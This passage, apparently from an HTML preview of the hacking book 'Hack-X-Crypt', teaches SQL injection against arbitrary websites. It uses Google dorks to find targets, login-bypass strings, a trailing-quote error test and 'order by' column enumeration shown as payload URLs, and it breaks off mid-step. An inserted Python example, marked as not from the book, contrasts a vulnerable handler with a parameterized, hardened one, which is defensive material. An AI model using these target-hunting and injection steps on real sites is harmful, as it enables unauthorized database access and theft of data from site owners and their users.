Hack-X-Crypt by Ujjwal Sahay - HTML preview


Take your time and come to this chapter serious and free of distractions, because it is very wide-ranging and one of the most interesting of all the chapters so far. In this chapter we will discuss how to hack any vulnerable site using SQL injection.

What is SQL Injection?

SQL injection is one of the most popular web application hacking methods. Using a SQL injection attack, an unauthorized person can access the website's database and extract data from it.

What can a hacker do with a SQL injection attack?

* Bypassing logins

* Accessing secret data

* Modifying contents of the website

* Shutting down the MySQL server

So, here we start with bypassing the login, i.e.

Authentication bypass:-

In this type of SQL injection, we have generally already found the admin login page, and we then try to open the admin's control panel account by bypassing the authentication.

If you have the admin login page of a website, you can paste the following codes (with quotes) to bypass the website's authentication. Generally, PHP websites are vulnerable to this injection:-

You can find sites of this type simply through Google searches. Type something like this in the Google search bar:-

www.thesitename.com/adminlogin.php?

Or

/admin.php?

Or

Wp-login.php?

Etc.

After finding the login page, you have to paste the following codes into both the userID and password fields of the admin page until the login is bypassed. If that does not work, we will try the next kinds of SQL injection, i.e. union based, blind based, error based, etc.

The codes to be used as both userID and password at the admin login page of a vulnerable website for bypassing authentication are as follows:-

img72.png

If the authentication bypass does not work, then try the following techniques carefully and step by step:-

UNION BASED SQLi:-

Finding Vulnerable Website:

To find a site vulnerable to SQL injection, you can use Google search by searching for certain keywords. Such a keyword is often called a "Google dork".

Some Examples:

inurl:index.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:pageid=

Now copy one of the above keywords and Google it. You will get a lot of search results, and you have to visit the websites one by one to find the vulnerability.

For example:-

site:www.anyselectedsite.com inurl:index.php?id=

Step 1: Finding the Vulnerability:

Now let us check the vulnerability of the target website. To check the vulnerability, add a single quote (') at the end of the URL and press Enter.

For eg:

http://www.anyselectedsite.com/index.php?id=2'

If the page stays the same or shows "page not found", then it is not vulnerable.

If you get an error message like this one, it means that the site is vulnerable.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
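
Why the quote in Step 1 produces that error, and what removes the signal, shown as an added example that is not from the book. It uses Python with an in-memory SQLite database standing in for the PHP page and its MySQL server; the `articles` table and the functions `page_vulnerable` and `page_hardened` are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data; in-memory SQLite stands in for the site's MySQL server.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                   [(1, "Welcome", "First post"), (2, "News", "Second post")])
    return db

def page_vulnerable(db, raw_id):
    """Concatenates the id into the SQL text and echoes database errors."""
    sql = "SELECT title, body FROM articles WHERE id = " + raw_id
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # The parser error reaches the visitor: the signal Step 1 relies on.
        return 500, "SQL error: %s" % exc
    return (200, row[0]) if row else (404, "Not found")

def page_hardened(db, raw_id):
    """Validates the id, binds it as a parameter, keeps DB errors server-side."""
    # Layer 1: the id must be a short run of ASCII digits, nothing else.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return 404, "Not found"
    try:
        # Layer 2: the value travels separately from the SQL text, so it can
        # never be parsed as SQL even if the validation above were removed.
        row = db.execute("SELECT title, body FROM articles WHERE id = ?",
                         (int(raw_id),)).fetchone()
    except sqlite3.Error:
        # Layer 3: log details server-side; the visitor sees nothing specific.
        return 500, "Internal error"
    return (200, row[0]) if row else (404, "Not found")

if __name__ == "__main__":
    db = make_db()
    for raw in ("2", "2'"):  # the normal id and the Step 1 test value
        print(repr(raw), page_vulnerable(db, raw), page_hardened(db, raw))
```

With the hardened handler, the quoted id and a nonexistent id produce the same response, so the error text no longer distinguishes them.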

Step 2: Finding Number of columns in the database:

Great, we have found that the website is vulnerable to SQLi attack. Our next step is to find the number of columns present in the target Database.

For that, replace the single quote (') with an "order by n" statement. Change n through 1, 2, 3, 4, 5, 6, ... n until you get an error like "unknown column".

For eg:

http://www.anyselectedsite.com/index.php?id=2 order by 1

http://www.anyselectedsite.com/index.php?id=2 order by 2

http://www.anyselectedsite.com/index.php?id=2 order by 3

http://www.anyselectedsite.com/index.php?id=2 order by 4

If you get the error while trying the "n"th number, then the number of columns is "n-1".

I mean:-

http://www.anyselectedsite.com/index.php?id=2 order by 1 (no error shown)

http://www.anyselectedsite.com/index.php?id=2 order by 2 (no error shown)

http://www.anyselectedsite.com/index.php?id=2 order by 3 (no error shown)

http://www.anyselectedsite.com/index.php?id=2 order by 4 (no error shown)

http://www.anyselectedsite.com/index.php?id=2 order by 5 (no error shown)

http://www.anyselectedsite.com/index.php?id=2 order by 6 (no error shown)

http://www.anyselectedsite.com/index.php?id=2 order by 7{no